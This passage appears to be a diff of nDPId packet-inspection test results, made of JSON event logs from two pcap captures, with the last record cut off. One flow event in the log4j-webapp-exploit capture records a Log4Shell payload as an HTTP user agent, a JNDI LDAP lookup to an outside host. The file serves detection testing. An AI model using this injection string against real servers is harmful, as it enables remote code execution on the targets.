00458{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1505724523425,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABogi4AAEARLi6EvvQMl3m5LAhoCGgAVAAAMv8ARAE8W3R6UAAARQAAQGNPQABABin1wKiTsZd5waDkgAG7QsbcfVXaB5OwEAIjg6MAAAEBCAoAC7rNMW8EIAEBBQpV2gbPVdoHkw=="}
00270{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":11,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":118,"expected":122,"global_ts_msec":1505724523784} 00256{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":11,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":118,"expected":122,"global_ts_msec":1505724523784}
01160{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":629,"pkt_l4_len":0,"thread_ts_msec":1505724523784,"pkt":"\/Ejvopo\/MNF+D2w+CABFuAJnsccAAEAR\/JWEvvQMl3m5LAhoCGgCUwAAMv8CQwE8W3R7UAAARQACP2NQQABABif1wKiTsZd5waDkgAG7QsbcfVXaB5OAGAIjv8IAAAEBCAoAC7rRMW8EIBYDAwIGEAACAgIAmOi+GN3N8UwFIOyGgG7fRoYqddIen6fJLfOoMdGcgjC7EXRuMLo4ueRPzuPNKTKsd0rXjIh8nF1luCtj74M6hLMrC8RgUQ8NtWnU+VyJ5ocLdxtzZF0gGB+1NhUGr48PAz8CyV8iWtZ4r5z1HdzPAjUZcbzNDe0GFdLkO0mrmT1V\/fADZpMXfOis2u6uwZpitz8p9IosL8QiH6+IqUMckXifdvysezYp9tH9I18YsH7HyCm46xkjwyg7bNLoY89xVSe+3KoGnCgNymiAS0DFirvRnfEhZ55M6aVqDHyopcrpE\/p7Ra+JZESNmMF2sYfinmGSLWypwRK8tqaU\/ff99MtBg4KsFRNdp7dUOalIiR2j+\/gLC7fy\/B8rinO1aEkQfPwupPH+TOkI6kU7p6ZpEMlgYUAeUCVVdw2kpGnwan1lhC7pX4eYGUKHCcYnb9WwWjN9kb1rdtJu6KJWHsmxhkqn+5IJXszwezV7EVVZplgJPkRBwWsUatOWpjd9GuEZrUofu+2zRAWb37O45WXULSMfnimMKJd4Xwqcyx7tqMpzzTK7dWYdIkVZW9y5jVbcfrEnX0PFjjBobFRt6z81tve44yNzWQLg\/BhIGmKgyP4ZWrM3REf0v0GIj8wfwr+jHsMczvQifNTnUyyug\/Xc6cQyMh8qaav4EhHbL4l4yFg="} 01146{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":629,"pkt_l4_len":0,"thread_ts_msec":1505724523784,"pkt":"\/Ejvopo\/MNF+D2w+CABFuAJnsccAAEAR\/JWEvvQMl3m5LAhoCGgCUwAAMv8CQwE8W3R7UAAARQACP2NQQABABif1wKiTsZd5waDkgAG7QsbcfVXaB5OAGAIjv8IAAAEBCAoAC7rRMW8EIBYDAwIGEAACAgIAmOi+GN3N8UwFIOyGgG7fRoYqddIen6fJLfOoMdGcgjC7EXRuMLo4ueRPzuPNKTKsd0rXjIh8nF1luCtj74M6hLMrC8RgUQ8NtWnU+VyJ5ocLdxtzZF0gGB+1NhUGr48PAz8CyV8iWtZ4r5z1HdzPAjUZcbzNDe0GFdLkO0mrmT1V\/fADZpMXfOis2u6uwZpitz8p9IosL8QiH6+IqUMckXifdvysezYp9tH9I18YsH7HyCm46xkjwyg7bNLoY89xVSe+3KoGnCgNymiAS0DFirvRnfEhZ55M6aVqDHyopcrpE\/p7Ra+JZESNmMF2sYfinmGSLWypwRK8tqaU\/ff99MtBg4KsFRNdp7dUOalIiR2j+\/gLC7fy\/B8rinO1aEkQfPwupPH+TOkI6kU7p6ZpEMlgYUAeUCVVdw2kpGnwan1lhC7pX4eYGUKHCcYnb9WwWjN9kb1rdtJu6KJWHsmxhkqn+5IJXszwezV7EVVZplgJPkRBwWsUatOWpjd9GuEZrUofu+2zRAWb37O45WXULSMfnimMKJd4Xwqcyx7tqMpzzTK7dWYdIkVZW9y5jVbcfrEnX0PFjjBobFRt6z81tve44yNzWQLg\/BhIGmKgyP4ZWrM3REf0v0GIj8wfwr+jHsMczvQifNTnUyyug\/Xc6cQyMh8qaav4EhHbL4l4yFg="}
00270{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":12,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":629,"expected":633,"global_ts_msec":1505724525364} 00256{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":12,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":629,"expected":633,"global_ts_msec":1505724525364}
00465{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":13,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":112,"pkt_l4_len":0,"thread_ts_msec":1505724525364,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABis2MAAEAR\/P6EvvQMl3m5LAhoCGgATgAAMv8APgE8W3R8UAAARQAAOmNRQABABin5wKiTsZd5waDkgAG7QsbeiFXaB5OAGAIjWbAAAAEBCAoAC7rRMW8EIBQDAwABAQ=="} 00451{"packet_event_id":1,"packet_event_name":"packet","packet_id":13,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":112,"pkt_l4_len":0,"thread_ts_msec":1505724525364,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABis2MAAEAR\/P6EvvQMl3m5LAhoCGgATgAAMv8APgE8W3R8UAAARQAAOmNRQABABin5wKiTsZd5waDkgAG7QsbeiFXaB5OAGAIjWbAAAAEBCAoAC7rRMW8EIBQDAwABAQ=="}
00270{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":13,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":112,"expected":116,"global_ts_msec":1505724525422} 00256{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":13,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":112,"expected":116,"global_ts_msec":1505724525422}
00516{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":14,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":151,"pkt_l4_len":0,"thread_ts_msec":1505724525422,"pkt":"\/Ejvopo\/MNF+D2w+CABFuACJtcMAAEAR+neEvvQMl3m5LAhoCGgAdQAAMv8AZQE8W3R9UAAARQAAYWNSQABABinRwKiTsZd5waDkgAG7QsbejlXaB5OAGAIj3G8AAAEBCAoAC7rRMW8EIBYDAwAoAAAAAAAAAADM1WLZBbPlOmD9XANW49sO0tmduGTuSuv4J+SEqWJkSA=="} 00502{"packet_event_id":1,"packet_event_name":"packet","packet_id":14,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":151,"pkt_l4_len":0,"thread_ts_msec":1505724525422,"pkt":"\/Ejvopo\/MNF+D2w+CABFuACJtcMAAEAR+neEvvQMl3m5LAhoCGgAdQAAMv8AZQE8W3R9UAAARQAAYWNSQABABinRwKiTsZd5waDkgAG7QsbejlXaB5OAGAIj3G8AAAEBCAoAC7rRMW8EIBYDAwAoAAAAAAAAAADM1WLZBbPlOmD9XANW49sO0tmduGTuSuv4J+SEqWJkSA=="}
00270{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":14,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":151,"expected":155,"global_ts_msec":1505724525500} 00256{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":14,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":151,"expected":155,"global_ts_msec":1505724525500}
00516{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":21,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":151,"pkt_l4_len":0,"thread_ts_msec":1505724525702,"pkt":"\/Ejvopo\/MNF+D2w+CABFuACJx48AAEAR6KuEvvQMl3m5LAhoCGgAdQAAMv8AZQE8W3SBUAAARQAAYWNTQABABinQwKiTsZd5waDkgAG7QsbejlXaB5OAGAIj26cAAAEBCAoAC7uZMW8EIBYDAwAoAAAAAAAAAADM1WLZBbPlOmD9XANW49sO0tmduGTuSuv4J+SEqWJkSA=="} 00502{"packet_event_id":1,"packet_event_name":"packet","packet_id":21,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":151,"pkt_l4_len":0,"thread_ts_msec":1505724525702,"pkt":"\/Ejvopo\/MNF+D2w+CABFuACJx48AAEAR6KuEvvQMl3m5LAhoCGgAdQAAMv8AZQE8W3SBUAAARQAAYWNTQABABinQwKiTsZd5waDkgAG7QsbejlXaB5OAGAIj26cAAAEBCAoAC7uZMW8EIBYDAwAoAAAAAAAAAADM1WLZBbPlOmD9XANW49sO0tmduGTuSuv4J+SEqWJkSA=="}
00270{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":21,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":151,"expected":155,"global_ts_msec":1505724526101} 00256{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":21,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":151,"expected":155,"global_ts_msec":1505724526101}
00456{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":22,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724526101,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcySMAAEAR50SEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3SDUAAARQAANGNUQABABin8wKiTsZd5waDkgAG7Qsbeu1XaCFKAEAIjZNIAAAEBCAoAC7vdMW8PEg=="} 00442{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724526101,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcySMAAEAR50SEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3SDUAAARQAANGNUQABABin8wKiTsZd5waDkgAG7Qsbeu1XaCFKAEAIjZNIAAAEBCAoAC7vdMW8PEg=="}
00270{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":22,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724526161} 00256{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":22,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724526161}
01937{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":24,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1202,"pkt_l4_len":0,"thread_ts_msec":1505724526302,"pkt":"\/Ejvopo\/MNF+D2w+CABFuASk0zUAAEAR2OqEvvQMl3m5LAhoCGgEkAAAMv8EgAE8W3SEUAAARQAEfGNVQABABiWzwKiTsZd5waDkgAG7Qsbeu1XaCIaAGAIjjQIAAAEBCAoAC7viMW8PEhcDAwRDAAAAAAAAAAFJqZsr2XFOAWwXDu0+7Y9vPaXF6QBuCgzG25Q\/KbgqYu88jDq040h3tvc+aLu+DTcTspkgI5XvLXRFxqBxdvTufQDpaiPCYyECwSJhep14pGbJr74Zfc\/j6Av4+JPM7XoLFlKyk030dBFrQrGR3OC0pR3zpNnKaUQjB+tTd4nLUXzWv2mjrWj7pce\/bPzpfedXtz8tcxLvi8SEHscHZsArZDwdeUf5QLLvVFDZNU4ZEQaimEyX15KzM6G5ToQIrvIFXEhAF3dG5oXfA+Ae4WLPSnyb5NwMMF4kDDNIe1ZVjNBxSABFaYjPPiJg0gQg\/+QEqg1CX23cpDZyJxz7smWB9h7xs7H9AygfzY9wASIaEq6DqGATMfMsN3dYWATzH3hum27SvUyhZ75L0k5HqqsoGIfu+LYC1hNDONFV6+lkufq4BpitkoCYAzdbmomEw05OzNlTrWr0XPFYwgNz7thDeUGqO\/xKaUFeEC4Y7Xy1Gc41hkWo54xuUrmAxO9X1\/+gkn+c3MHGrRESux79pmus577Y7Fo4U\/4oJ6luI0bGV303za2qj4yCdXLeQWjtrOGdBBkw\/wBHF5IbYMOF9bJFx68HeOrrn4nYFgmVhrWXDxyY1xWgLDIjRY5UDtLoQjMcM03rPMf1Z8L76UZ2YHFgGbBPU1OGctMjFUx+R73JxaqxVRw4ymshyrqvP9+E3HE7UquBR2x9EQISSgDorx56T92cLWOMHjn+ek1JnoCiwSF6nQ5wDmyw72RptvWz6AU0FUnuqURBs\/Yt3PJfdurGsJxYBs+wDZGPNy41Qf5bJwUyIKMkYqmgYULqkbNWOZxFV99s4+BV262g1PDKETuLCv2a\/bmZ\/xolpL0HSIF0vX2xBElZHZ+hd84KVa1Y1XFdDw8mr7TyDNVUiL3tNunlmrQfdQETgjFhKIaQn6XGF8V1kH05Pfc52o2vbYUaSnIDJWt30SPlvtzw5ruQY4AYjS9\/zvW4ADabvEgwiTZjb2txs6oHyKnVCekE0WjVDCEceBK1aQn6rKOOPXvKdj3iDTl1Ep2O3m+u3pqEIGzMPxhnKMpUTUMR5vH5kQ6XVO3\/\/O3Fv4Gs+QXjMNEsaI4CKiHU5k1Q0MbXxbrvkqD7nzLmoRz\/kTcbg2\/gjB1KRUMXAi27pqag38iFL5LdNl02Bk8czI\/JMSOpzjzmaW1x5HQLihorbExEU6gi6LG\/RLyN0wdxLAEVfUuvGwMzSO969\/mxBBfNydqDsDV4YQiFLRSJTGt9vGEn+QmnSkfZdl3aM1n9v1oUbRwSanCl2G5YkrCo8NVoEuKsjRybURkxyp7cEy1T38EAeIr7HE3lwdlheQG63MqfDiIz7ld4f9Q0nYgQa1Und43tDU8iH72YEZe9PfwwG1sJOBUaECdibU9+goippYdBUnHF+Q41lhVnISz+74wOY0LMuM8="} 01923{"packet_event_id":1,"packet_event_name":"packet","packet_id":24,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1202,"pkt_l4_len":0,"thread_ts_msec":1505724526302,"pkt":"\/Ejvopo\/MNF+D2w+CABFuASk0zUAAEAR2OqEvvQMl3m5LAhoCGgEkAAAMv8EgAE8W3SEUAAARQAEfGNVQABABiWzwKiTsZd5waDkgAG7Qsbeu1XaCIaAGAIjjQIAAAEBCAoAC7viMW8PEhcDAwRDAAAAAAAAAAFJqZsr2XFOAWwXDu0+7Y9vPaXF6QBuCgzG25Q\/KbgqYu88jDq040h3tvc+aLu+DTcTspkgI5XvLXRFxqBxdvTufQDpaiPCYyECwSJhep14pGbJr74Zfc\/j6Av4+JPM7XoLFlKyk030dBFrQrGR3OC0pR3zpNnKaUQjB+tTd4nLUXzWv2mjrWj7pce\/bPzpfedXtz8tcxLvi8SEHscHZsArZDwdeUf5QLLvVFDZNU4ZEQaimEyX15KzM6G5ToQIrvIFXEhAF3dG5oXfA+Ae4WLPSnyb5NwMMF4kDDNIe1ZVjNBxSABFaYjPPiJg0gQg\/+QEqg1CX23cpDZyJxz7smWB9h7xs7H9AygfzY9wASIaEq6DqGATMfMsN3dYWATzH3hum27SvUyhZ75L0k5HqqsoGIfu+LYC1hNDONFV6+lkufq4BpitkoCYAzdbmomEw05OzNlTrWr0XPFYwgNz7thDeUGqO\/xKaUFeEC4Y7Xy1Gc41hkWo54xuUrmAxO9X1\/+gkn+c3MHGrRESux79pmus577Y7Fo4U\/4oJ6luI0bGV303za2qj4yCdXLeQWjtrOGdBBkw\/wBHF5IbYMOF9bJFx68HeOrrn4nYFgmVhrWXDxyY1xWgLDIjRY5UDtLoQjMcM03rPMf1Z8L76UZ2YHFgGbBPU1OGctMjFUx+R73JxaqxVRw4ymshyrqvP9+E3HE7UquBR2x9EQISSgDorx56T92cLWOMHjn+ek1JnoCiwSF6nQ5wDmyw72RptvWz6AU0FUnuqURBs\/Yt3PJfdurGsJxYBs+wDZGPNy41Qf5bJwUyIKMkYqmgYULqkbNWOZxFV99s4+BV262g1PDKETuLCv2a\/bmZ\/xolpL0HSIF0vX2xBElZHZ+hd84KVa1Y1XFdDw8mr7TyDNVUiL3tNunlmrQfdQETgjFhKIaQn6XGF8V1kH05Pfc52o2vbYUaSnIDJWt30SPlvtzw5ruQY4AYjS9\/zvW4ADabvEgwiTZjb2txs6oHyKnVCekE0WjVDCEceBK1aQn6rKOOPXvKdj3iDTl1Ep2O3m+u3pqEIGzMPxhnKMpUTUMR5vH5kQ6XVO3\/\/O3Fv4Gs+QXjMNEsaI4CKiHU5k1Q0MbXxbrvkqD7nzLmoRz\/kTcbg2\/gjB1KRUMXAi27pqag38iFL5LdNl02Bk8czI\/JMSOpzjzmaW1x5HQLihorbExEU6gi6LG\/RLyN0wdxLAEVfUuvGwMzSO969\/mxBBfNydqDsDV4YQiFLRSJTGt9vGEn+QmnSkfZdl3aM1n9v1oUbRwSanCl2G5YkrCo8NVoEuKsjRybURkxyp7cEy1T38EAeIr7HE3lwdlheQG63MqfDiIz7ld4f9Q0nYgQa1Und43tDU8iH72YEZe9PfwwG1sJOBUaECdibU9+goippYdBUnHF+Q41lhVnISz+74wOY0LMuM8="}
00272{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":24,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":1202,"expected":1206,"global_ts_msec":1505724526501} 00258{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":24,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":1202,"expected":1206,"global_ts_msec":1505724526501}
00456{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724526501,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABc0zYAAEAR3TGEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3SFUAAARQAANGNWQABABin6wKiTsZd5waDkgAG7QsbjA1XaCIaAEQIjYE4AAAEBCAoAC7vkMW8PEg=="} 00442{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724526501,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABc0zYAAEAR3TGEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3SFUAAARQAANGNWQABABin6wKiTsZd5waDkgAG7QsbjA1XaCIaAEQIjYE4AAAEBCAoAC7vkMW8PEg=="}
00270{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724526501} 00256{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724526501}
00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1505724520744,"flow_last_seen":1505724526702,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5832,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1505724526702,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1505724520744,"flow_last_seen":1505724526702,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5832,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1505724526702,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
00499{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-data-len":5832,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-events-serialized":35,"global_ts_msec":1505724526702} 00499{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-data-len":5832,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-events-serialized":35,"global_ts_msec":1505724526702}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -45,6 +45,6 @@
~~ total memory freed........: 4680581 bytes ~~ total memory freed........: 4680581 bytes
~~ total allocations/frees...: 101170/101170 ~~ total allocations/frees...: 101170/101170
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 274 chars ~~ json string min len.......: 260 chars
~~ json string max len.......: 1942 chars ~~ json string max len.......: 1928 chars
~~ json string avg len.......: 1101 chars ~~ json string avg len.......: 1087 chars

20
test/results/log4j-webapp-exploit.pcap.out
View File

@@ -5,10 +5,10 @@
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} 01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 